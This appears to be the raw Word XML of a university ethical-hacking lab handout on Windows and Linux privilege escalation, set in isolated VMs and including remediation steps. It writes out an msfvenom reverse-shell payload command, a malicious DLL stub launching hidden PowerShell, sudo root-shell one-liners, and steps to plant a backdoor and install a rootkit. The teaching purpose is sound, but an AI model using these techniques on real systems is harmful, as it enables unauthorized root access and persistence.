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4EA1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Week 7 Lab Activities: Operating System Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBB39DA" w14:textId="5FA77748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Course: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CCS6324 Ethical Hacking and Penetration Testing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Week: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15-21 December</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA71EFC" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="003015EA" w:rsidP="00AD0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015E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6CF309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95C8BA1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Environment Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E657069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Prerequisites:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74964C93" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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VirtualBox or Hyper-V with snapshot capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45049AD7" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Windows 7/10 vulnerable VM (OWASP WebGoat or Metasploitable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB4F243" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Linux vulnerable VMs (Metasploitable 2, DVWA Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BECB1C" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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isolation to prevent accidental production exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4682B1AF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Reminder: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activities are conducted in isolated lab environments. Never test on systems without explicit written authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE76F7A" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="003015EA" w:rsidP="00AD0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015E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588288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FAC5A30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Assessment Weighting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B082372" w14:textId="0C6AE872" w:rsidR="00C764E9" w:rsidRPr="00C764E9" w:rsidRDefault="00C764E9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Difficulty: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3015EA" w:rsidRPr="003015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Beginner</w:t>
      </w:r>
      <w:r w:rsidR="00E553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</w:t>
      </w:r>
      <w:r w:rsidR="003015EA" w:rsidRPr="003015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3015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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598DC468" w14:textId="2D2781B3" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00C764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Mark Allocation:</w:t>
      </w:r>
      <w:r w:rsidR="00C7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Weekly Lab Activities: 5% of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100 marks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB4AE56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 Activity Completion Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6490E9F0" w14:textId="36F55412" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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</w:t>
      </w:r>
      <w:r w:rsidR="007E1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minimum </w:t>
      </w:r>
      <w:r w:rsidR="007E1B5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 </w:t>
      </w:r>
      <w:r w:rsidR="005621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 of 7 lab activities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266B8E15" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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deliverables for each activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073672B4" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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 hands-on execution and understanding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDB2A46" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="003015EA" w:rsidP="00AD0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015E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386F5A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8F192D3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Activity 1: Windows Unquoted Service Path Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769A88DB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Identify and exploit unquoted service paths for privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DF3095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Activity Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B57B92A" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Vulnerability Identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6775F9" w14:textId="77777777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Windows 7/10 lab VM, open Command Prompt as administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2592B8" w14:textId="063CD81D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Run: </w:t>
      </w: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wmic service get name,pathname,startmode | findstr /V </w:t>
      </w:r>
      <w:r w:rsidR="007E1B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“</w:t>
      </w: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^REM</w:t>
      </w:r>
      <w:r w:rsidR="007E1B5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”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7A7EB3" w14:textId="77777777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services with spaces in paths lacking quotes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595B7B68" w14:textId="77777777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service names, paths, and current user privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259A3194" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276CCAB7" w14:textId="77777777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identified services for exploitation potential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A9A10E" w14:textId="77777777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directory write permissions: </w:t>
      </w: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icacls C:\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D945001" w14:textId="77777777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if target directories are writable by standard users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCE1FDC" w14:textId="77777777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 service startup type (automatic vs. manual)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A93189" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Exploitation Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DE1CED" w14:textId="29354BE9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="00C7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malicious payload using msfvenom: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740886DD" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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msfvenom -p windows/meterpreter/reverse_tcp LHOST=&lt;your-ip&gt; LPORT=4444 -f exe &gt; Program.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062AB32A" w14:textId="377B63BE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up multi/handler in Metasploit to receive </w:t>
      </w:r>
      <w:r w:rsidR="00C7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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2814DF" w14:textId="120EDFF5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Place </w:t>
      </w:r>
      <w:r w:rsidR="00C7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payload in </w:t>
      </w:r>
      <w:r w:rsidR="00C7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identified vulnerable directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB574D9" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Execution and Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F506765" w14:textId="77777777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Restart the vulnerable service or wait for automatic restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9B813C" w14:textId="6D51EC7A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</w:t>
      </w:r>
      <w:r w:rsidR="00C7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successful connection in </w:t>
      </w:r>
      <w:r w:rsidR="00C7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Metasploit handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB991B9" w14:textId="77777777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elevated privileges (SYSTEM access)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C181F27" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346FF6CE" w14:textId="77777777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malicious executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465C1C4B" w14:textId="77777777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Quote the service path: </w:t>
      </w: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 config ServiceName binPath= "C:\Program Files\Service\app.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B652D2" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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proper permissions on system directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B941982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6BA3542F" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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 showing identified unquoted service paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E1859C" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Proof of privilege escalation (SYSTEM shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCF994D" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Remediation steps documented with verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1038DA8B" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="003015EA" w:rsidP="00AD0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015E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B8A7C8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024C97B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Activity 2: Windows DLL Hijacking Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E525C5C" w14:textId="7BBCDCE1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Execute arbitrary code through </w:t>
      </w:r>
      <w:r w:rsidR="00C7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DLL hijacking vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57221F4E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Activity Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5317E141" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Application Selection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5629665C" w14:textId="0B537F23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an application on </w:t>
      </w:r>
      <w:r w:rsidR="00C7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Windows lab VM that loads external DLLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D48B8E8" w14:textId="77777777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Dependency Walker to map DLL dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EA5BD2" w14:textId="77777777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DLL search order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED16253" w14:textId="713A443F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writable directories in </w:t>
      </w:r>
      <w:r w:rsidR="00C764E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path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B5FE97" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Malicious DLL Creation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF4CB2F" w14:textId="77777777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C/C++ DLL with payload: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6323AC4E" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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#include &lt;windows.h&gt;BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved){    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {        WinExec("cmd.exe /c powershell.exe -nop -w hidden ...", SW_HIDE);    }    return TRUE;}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A960B45" w14:textId="4AECDE77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Compile DLL with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same name as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legitimate library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193B353A" w14:textId="77777777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compatibility (32-bit/64-bit matching)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F75BFC6" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Placement and Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334AD045" w14:textId="59E126AF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Place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malicious DLL in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writable directory found in search order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5824A987" w14:textId="5E62C705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Execute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application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11887E4E" w14:textId="77777777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payload execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C623D25" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Detection and Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD080DF" w14:textId="77777777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Process Monitor for DLL loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CECA8FB" w14:textId="77777777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 file access patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1B60FA" w14:textId="77777777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signs of DLL hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B642EB6" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D60D86F" w14:textId="77777777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malicious DLL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575BC568" w14:textId="77777777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DLL search order safeguards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B111A0" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082D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code signing and validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FE2815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0E5451F9" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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DLL dependency analysis documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D9749B" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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of malicious DLL execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585B4329" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Monitor logs showing DLL loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402C6877" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Remediation steps with validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B07EA4" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="003015EA" w:rsidP="00AD0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015E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AD7383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7F71226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Activity 3: Linux SUID Binary Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C801AF7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Escalate privileges using vulnerable SUID binaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7532F6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Activity Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4130CAA7" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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SUID Binary Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DB46DB" w14:textId="78EC08AB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Metasploitable 2 or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vulnerable Linux VM, run: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0239FF67" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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/ -perm -4000 -type f -ls 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0607BC9B" w14:textId="77777777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discovered binaries for known vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DB43E6" w14:textId="77777777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on less common SUID binaries (not standard utilities)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C8CB3B" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Vulnerability Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4929445D" w14:textId="77777777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identified SUID binaries for CVEs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F308AE3" w14:textId="20AFC8EA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binary for buffer overflow or logic flaws</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144CFDE9" w14:textId="77777777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 exploitation feasibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B58625" w14:textId="77777777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privilege escalation path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E8239E" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Exploitation Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AB26A2" w14:textId="54D2D186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exploit code targeting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vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF60491" w14:textId="77777777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Compile if necessary (C/C++ binary exploits)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1A2836" w14:textId="77777777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 exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25856AEC" w14:textId="77777777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root access: </w:t>
      </w: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whoami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0A63A845" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3B0BF3" w14:textId="77777777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access method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70463B8C" w14:textId="079A1F58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backdoor for persistence (authorized lab only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516754A2" w14:textId="77777777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Gather system information as root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04269E8D" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589D3693" w14:textId="77777777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unnecessary SUID bits: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22439DD0" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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chmod u-s /path/to/vulnerable/binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170A0A6F" w14:textId="77777777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Patch vulnerable software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773EFDF1" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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AppArmor/SELinux restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A0FA8A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28B860DE" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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discovered SUID binaries with analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4468EB3B" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Exploitation proof (root shell screenshot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08151453" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Exploit code or methodology documented</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB9581F" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Remediation verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007657EF" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="003015EA" w:rsidP="00AD0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015E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D95017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71827EA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Activity 4: Linux sudo GTFOBins Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C02FC6" w14:textId="77777777" w:rsid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Escalate privileges using misconfigured sudo access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A262219" w14:textId="49E000A5" w:rsidR="00422D84" w:rsidRPr="00AD082D" w:rsidRDefault="00422D84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2D8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Difficulty:</w:t>
      </w:r>
      <w:r w:rsidRPr="00422D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Beginner to Intermediate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4790D3A3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Activity Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A13E045" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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sudo Configuration Review</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078F788F" w14:textId="2D0E55BC" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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 user, check sudo access: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2610AFFC" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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-l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693C2C90" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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allowed commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44867E3B" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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potentially exploitable tools (vim, find, awk, less, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A5892D" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Exploitation Using vim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478C8B31" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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vim is in sudo allowlist: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C4BCC6" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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vim /tmp/dummy_file:!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178B004D" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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root access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9753ED" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Exploitation Using find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7B8FA7" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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find is in sudo allowlist: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6142CA5D" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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find . -exec /bin/bash \;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5A43AD" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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root access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E32148" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Exploitation Using awk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B80B467" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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awk is in sudo allowlist: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2395A6D1" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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awk 'BEGIN {system("/bin/bash")}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2D59C5" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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root access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D9BD19" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Exploitation Using less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41383C74" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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less is in sudo allowlist: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2573F5D9" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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less /etc/passwd!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAB5926" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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root access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04880669" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716AAA81" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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sudoers safely using </w:t>
      </w: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visudo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241C1831" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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visudo# Remove dangerous commands, add specific command restrictions# Example: user ALL=(ALL) NOPASSWD: /usr/bin/find -type f -name "*.log"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D8D70E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6DBF2A52" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Screenshot of </w:t>
      </w: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-l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output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C77DC1" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Proof of privilege escalation for each exploitable tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55303997" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Remediated sudoers configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361E45F3" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Comparison showing before/after security posture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426E4AED" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="003015EA" w:rsidP="00AD0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015E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866A18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C3D4329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Activity 5: Rootkit Installation and Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7546464C" w14:textId="5B63EDA2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Understand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functionality, installation, detection, and removal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rootkits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03B99D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Difficulty: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Advanced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF47402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Activity Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66133E80" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Rootkit Selection and Study</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B51A32C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Research open-source rootkits (for educational purposes): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ED8D53" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082D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chkrootkit (detection tool, demonstrates rootkit concepts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155387CA" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082D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GMER (Windows rootkit detection and analysis)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408D13AB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Study rootkit techniques and evasion methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F38654D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rootkit behavior and persistence mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3193478A" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Rootkit Installation (Lab Only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2C49AD" w14:textId="4379F39E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isolated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vulnerable VM, compile or install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rootkit</w:t>
      </w:r>
    </w:p>
